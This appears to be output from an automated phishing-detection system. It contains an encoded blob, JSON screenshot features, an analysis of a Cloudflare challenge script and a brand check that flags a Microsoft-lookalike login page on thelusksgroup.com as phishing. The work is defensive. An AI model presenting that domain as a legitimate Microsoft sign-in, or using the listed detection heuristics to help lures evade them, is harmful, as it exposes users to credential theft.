bz5YNbaY9avupouLWkNY96f655dLwpXCn3J+7dkBuf24buI7h+tj1Eh61oVcqt/eEtIxWnA6r8pZdQ4YYpERMTKRWLJGj7HR1BzkKaame665NzjUKGc6Hl94VSNgvjWlIVPWf//wnfvvtN31/f6f9vhU2nKuzpNlsiGQYvm1bMcZkw2+aDQHQb9++4ffff9e3tzeICEVG4FE9SsMGXpqfl9qOu0ilvklFxcUQJoV07GC4Qug4wuImy/pSOdVpzjGiF7IMg2Hq0OMVPZoV61PLti4/xTJg6J6uoqLioVEHwM+P0BvJGVTvZVlRcU7QxG8KJU9RSPZPMWJuAs6NXl8dr6+Y+aCzDkHC7hUliAaGJRhKs6514tnvUwMgc8cL+bDY+Hs3Ay1rXYNdGXFHYh+tbzJhV7+L0k8y6Ji8Xfkjx/5t3Y9aBsIvlFvL7nfItSOEjlPaaSp1ok61v4j7b8yd8Q6qa6mluNag+NT6mrim2gJLjcDnXObSWwo3d24prnBuvKy4bdTndPc45huTtt8HcR1kWCciJWJlInVsXRZmg8joG5AaJkt1jbo4Q3w0MPq2tkVrW/r111/x9vZGoqqGmTZPT/j4+AgT9sgwQ6yQtaIAaLvd4uNjR+K3X19f8f37d3KM4YastWBmattWW9vS169f8fHxQeL8h9LmaYO3tzciIjLGKDPDWhuYyqqqRETY7XYAwJtmI621bFurxERfvnyV3X7HAJSZabPZyH6/707cbDby/v7OIqLMTE9PT/L9+3du960SEX39+lV2u90gfHz+09OT7HY7ZmYlIhYRJuJedsRPgg5GOBHL7BJ+uqJ5ARxTgVUXX7eP4EUg9gRwQswZd2eNv7WFf3JU4/DnWCLaPhMzuL6dFRW3htGLvtY9UNUMnkUw/BrcCMs3t/Qz/0ZG6pHGxkLN1ruxrDw65ga+D9SAC+WiG23smLzLPvRBNypoqC7tTHThJHBJ2SXD3QeRDgZCFcNkpksSmRukPW/9FjQnO41Xr/GrLMtyMqcxlnmmJe2apc2ynEFXhjEIAwwSiE9Tqr8IdJqDXWHxRu+lxtrxUjnZLwJwVBjFX2eQpOj6Kx/YqZG+n33JdAmMNLNyRuCrpz+PTWEdyLOAw50XK4FR+WMKL3jn1LlgJO/fae3jJxDI6eO5gckgJRzErjNxdXVerOGm3MTHkM6oZdtk9/tt1vz+sPQTLYqz372Ga3e8pDF+u5jRYDxZ/FL4FtaOaYKUNUVApy1L6XHWfPgjttP12bRNbOc8EcwZZdfC5UMhnkwpzhl4c2nOGcNz5+qCeCsKWKuRecbzs2X2WI3xx8dc/X3unuiM5u8cJjWCu7hz7/V81KpQCFnt+mcx89fH6Nvq2sUfrucHBMRHJUTEsCIUjRF5QrELHwyebFiJiFSFIKQNM4kVJSIiJoRwxEQkqsxMUGgUcV+fK6vhDamQMjVuwp9z90TNpiGxUCgTm0a9wVRVFewGKlR7KyoFI7iVlhoi2Tw9MayV//mf/6bffvtdrFhmhYgV2jQbsWJZVd3205NY2zIRi7V7+utf/yp//vknt/tW/vz4k3755Rd5f3/3dxTsvC0DEJ/Z4tMgbdvy8/Mzdjvr25IugaIK44303lN0OP/0xfZEGDXLo/7KEuQ0gh+pzju15u8pELylWSiIAeO6MM64G9U0LICCAWWYKJ3q61RRBZEMdLq

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "Next",
    "text_input_field_labels": ["Email, phone, or Skype"],
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "risk_score": 4,
    "reasoning": "The script dynamically injects an iframe and a script into the DOM, which is a form of aggressive DOM manipulation (+2 points). It also executes a script from a relative path, which could be a concern if the domain is untrusted (+2 points). However, there is no clear indication of malicious intent or data exfiltration, and the script appears to be related to a challenge platform, possibly for security purposes. Further review is needed to determine the trustworthiness of the domain and the purpose of the script."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8efde7459d450f7f',t:'MTczMzg0MDcxOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'thelusksgroup.com' does not match the legitimate domain for Microsoft.",    "The URL does not contain any recognizable association with Microsoft.",    "The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing."  ],  "riskscore": 9}
Google indexed: False

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
  "typosquatting": false,
  "unusual_query_string": false,
  "suspicious_tld": false,
  "ip_in_url": false,
  "long_subdomain": false,
  "malicious_keywords": false,
  "encoded_characters": false,
  "redirection": false,
  "contains_email_address": false,
  "known_domain": true,
  "brand_spoofing_attempt": false,
  "third_party_hosting": false
}

URL: https://en.wikipedia.org

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
  "brands": [
    "Wikipedia"
  ]
}

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}